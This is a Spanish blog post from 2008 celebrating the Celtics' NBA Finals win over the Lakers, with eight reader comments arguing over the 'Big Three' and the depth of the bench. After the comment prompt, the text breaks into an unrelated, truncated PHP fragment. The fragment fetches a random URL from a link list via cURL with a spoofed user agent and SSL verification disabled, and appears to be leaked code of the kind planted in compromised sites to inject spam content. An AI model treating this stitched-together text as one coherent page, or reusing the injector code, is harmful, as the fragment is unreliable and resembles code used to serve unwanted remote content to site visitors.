21 años después… XVII (LAL 92 – BOS 131)

18 de June de 2008 por TheDeerHunter

Gran victoria final. Sin paliativos. Tan irresistibles y superiores como se han mostrado en todos los momentos críticos de esta temporada. Son, sin duda, merecidos campeones.

En ocasiones, el baloncesto otorga grandes recompensas y es que, más allá de los colores, resulta reconfortante asistir a un fundamento tan hermoso como el del talento al servicio del conjunto como el que nos ha brindado Boston este año. Resulta motivador presenciar que, frecuentemente, el esfuerzo y el sacrificio conducen al éxito y que la justicia existe, porque si algo no hubiera sido justo es que Garnett, Pierce y Allen se marcharan de esta liga sin un título que avale lo grandes que han sido.

Anoche, los Celtics, demostraron más que nunca que no se trata de un equipo ultra-defensivo, como se les ha etiquetado esta temporada, sino que disponen de talento a raudales. Que no son el nuevo Big Three, sino un grupo compacto en el que nadie se cree mejor que nadie y todos hacen su papel lo mejor que saben. Que son un equipo experimentado, con un entrenador muy capaz. Ambiciosos y nada soberbios, han sabido ganar con la humildad y la lucha por bandera. El carácter macerado de jugadores maltratados durante años por el resultadismo que a todos nos envuelve pero que ha terminado por germinar en este fantástico producto. Un equipo que será recordado el resto de nuestras vidas.

Los Lakers fueron privilegiados espectadores de una máquina perfectamente engrasada que no les dio ni una sola posibilidad, infinitamente superiores en todos los apartados, quedándose sin respuesta alguna. No hubo partido y poco hay que contar por ahí. Habrá mejores momentos para analizar con la cabeza fría cual ha sido su papel en toda esta historia.

Asistimos, a partir de ahora, a un cambio de ciclo, un cambio de las potencias dominantes de la liga, encabezadas por los Boston Celtics resucitados. Por fin han vuelto al lugar que no tenían que haber abandonado nunca. Algunos lo celebramos.

Comenta

8 comentarios a esta entrada

  1. Dantley dice:
    #1

    Enhorabuena a todos los verdes, y también, aunque menos, a los amarillos. No pasará a la historia esta final por su juego ni por su emoción, pero siempre será un Celtics-Lakers.

    Deer, para mí sí son el Big Three. Obviamente necesitas 5 jugadores para salir a la cancha y 3 o 4 más para dar minutos, pero seamos realistas, ¿Rondo? Tal vez tiene cierto presente y buen futuro, pero ¿Perkins? ¿Posey¡¡¡?? Estamos hablando de Posey, y eso que es el mejor del resto, pero añade PJ Brown y Cassel que suman 150 años entre ambos, House, el otro Allen, Powe, Davis … muchos de ellos serían segundas espadas en equipos ACB.

    Para mí es una mala noticia que la forma de llegar arriba cada vez sea más tener a dos o tres superestrellas y rellenar con cualquier cosa. En ese sentido, quizá los Pistons eran la única esperanza. La verdad es que echo de menos las ligas con menos equipos en las que el talento se diluía menos, pero bueno, es lo que Stern y los propietarios quieren.

    PD: Ray Allen con anillo ¡¡¡

      Citar

  2. TheDeerHunter dice:
    #2

    Yo no sé qué concepto de equipo tienes tú en la cabeza, pero a mí Boston y otros equipos como Lakers, me parece que están sobradamente equilibrados y representan muy bien modelo que nada tiene que envidiar a ninguno de la historia.

    Esta final, precísamente, en Boston se va a recordar por grandes actuaciones de Posey, de Powe, de House, que han estado absolutamente fantásticos ejerciendo SU FUNCIÓN ESPECÍFICA. Por supuesto de Perkins y Rondo, aunque estos últimos han sufrido problemas de distinta índole.
    Cassell y PJ Brown, han estado un pelín más irregulares pero han aportado muy buena experiencia (que se lo digan a Farmar o a Turiaf, que les ha tocado sufrirlos más directamente) y en menor medida Allen y Davis que, obviamente han tenido un papel menor porque no pueden jugar 18 jugadores al mismo tiempo.

    Hablas de que muchos de ellos seguramente serían 2as espadas en la ACB… y puede que sea así. Pero es que aquí son 5as o 6as espadas, porque muy poquitos equipos han tenido 5 o 6 primeras espadas… yo apenas recuerdo a los Celtics antiguos y poquitos más… ni siquiera los Lakers del Show Time tenían 5 primeras espadas, ni los Bulls, ni por supuesto Rockets, San Antonio ni mucho menos los Lakers de Shaq&Kobe. ¿ha sido alguna vez Horry una primera espada???
    Mi concepto de equipo es que un equipo tiene que tener artistas y tiene que tener trabajadores que cumplan sin alardes con su función… y, a estas alturas de la temporada, su trabajo tiene todavía más importancia y mérito si cabe.
    En mi opinión esta final no la ha ganado el Big Three, ellos han supuesto una base consistente, pero han sido los demás los que han marcado las diferencias con respecto a sus pares de Los Angeles.

    No puedes negar el grandísimo trabajo que han hecho y la importancia. Es demasiado evidente.
    En casi todos los partidos se ha marchado algún titular a vestuarios ¿se ha notado?? ¿se ha notado cuando estaban en el banquillo?? Realiza la misma pregunta en el lado amarillo.

      Citar

  3. txusma dice:
    #3

    Me uno a las felicitaciones a Boston…

    A pesar de la oportunidad perdida los amarillos han de mirar el futuro con esperanza. A ver como juega este equipo con Bynum en plenitud de facultades fisicas.

      Citar

  4. Dantley dice:
    #4

    El tema, Deer, es simplemente que sustituye a Perkins, Posey y House aleatoriamente por cualesquiera otros 3 jugadores de casi cualquier equipo y el resultado es el mismo, Boston candidato a título. Sustituye a Vujacic, Radmanovic y Farmar y el resultado es idéntico.

    Como se diría en economía, son commodities, son intercambiables. Lógicamente hay un mínimo, pero vamos, que lo que cada vez importa más es tener a dos/tres estrellas y eso cada vez va a perjudicar más a la liga con equipos vendiendo su futuro a cambio del presente. Eso se ha hecho siempre pero cada vez se hace y se hará más.

      Citar

  5. TheDeerHunter dice:
    #5

    No comparto tu planteamiento.
    Obviamente es más fácil sustituir un jugador secundario que un jugador específico del que igual sólo sale uno por decada (o como Garnett, que como él sólo sale un jugador así cada 20 o 30 años)
    De ahí a decir que sustituyendo esos 3 jugadores con una actuación más que notable durante estas finales por otros 3 cualquiera, el resultado hubiera sido el mismo… eso yo no lo considero correcto. Para nada… además de que ya entra en el ámbito de la elucubración.

    La tendencia que insinúas yo particularmente no la veo. Veo el mismo desequilibrio de equipos desde que empecé a ver baloncesto… y ya ha llovido (excepto en contadas excepciones como Celtics’80, Detroit o Kings… por poner algún ejemplo) Cocretamente en este caso lo veo menos marcado que en años anteriores.
    Tampoco entiendo eso de vender el futuro/presente y que cada vez se hace más. No sé a qué te refieres, cuando están saliendo equipos a mansalva que precísamente representan todo lo contrario (Sixers, Atlanta, Portland, Lakers…)

      Citar

  6. Viva_Dirk dice:
    #6

    La sensación es la que dice Jose, pero si repasamos los últimos 25 campeones, la mayoría es de ese modo, desde los Sixers de Moses&Erving, los Lakers de Magic, Jabbar y Worthy, los Bulls de Jordan, Houston con Olajuwon y Drexler, Lakers de Kobe&Shaq y los Heat de Wade y Shaq.

    Incluso los que nos han dejado sensación de equipos compactos tenian algun candidato al MVP o una superestrella, digase Thomas en los Bad Boys o Duncan en los Spurs, y en los Celtics de los 80 habia 3 jugadores por encima del resto.

    El único campeón que no tenia a ninguna superestrella eran los Pistons de Larry Brown.

      Citar

  7. Dantley dice:
    #7

    Sí, pero no me podéis comparar un Dennis Johnson o un Robert Parish con un Rondo o un Perkins, o del otro lado un James Worthy con Radmanovic. Vale, estaba Kurt Rambis, pero es que hasta Kurt Rambis me parece mejor que Perkins por ejemplo.

    No sé, a mí personalmente la diferencia entre los 3 buenos y el resto me parece abismal y que ha crecido conforme la liga se ha expandido 23-25-27-29-30. Es cuestión de números, el talento se dispersa.

      Citar

  8. TheDeerHunter dice:
    #8

    Ya hemos apuntado la naturaleza excepcional de aquellos Celtics… y aún así, aunque lejanamente podrían soportar la comparación… quien sabe de aquí a unos años.

    Pon, por ejemplo los últimos que ganaron a los Lakers, en el 84.
    El verdadero Big Three con Bird, McHale y Parish podrías compararlo con Garnett, Pierce y Allen. (no quiero caer en el sacrilegio, pero no olvidemos que estos últimos todavía tienen recorrido)

    Dennis Johnson, Danny Ainge, Cedrick Maxwell, Gerald Henderson… para de contar porque el resto ya son muy desconocidos.
    Hoy hablamos de Rondo, de Cassell, Posey, Kedrick Perkins y PJ Brown… dirás lo que quieras, pero salvando ciertas distancias la diferencia no es tan exagerada como dices.

    Sí, hay más equipos… pero también ahora mismo hay más jugadores potenciales. Antes sólo jugaban los USA. Ahora desde China hasta Eslovenia tiene un importante número de jugadores (y excelentes) en la NBA.
    Quien iba a decirnos hace bien poco que los Lakers iban a tener hasta 4 Europeos en su rotación, dos de ellos titulares.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>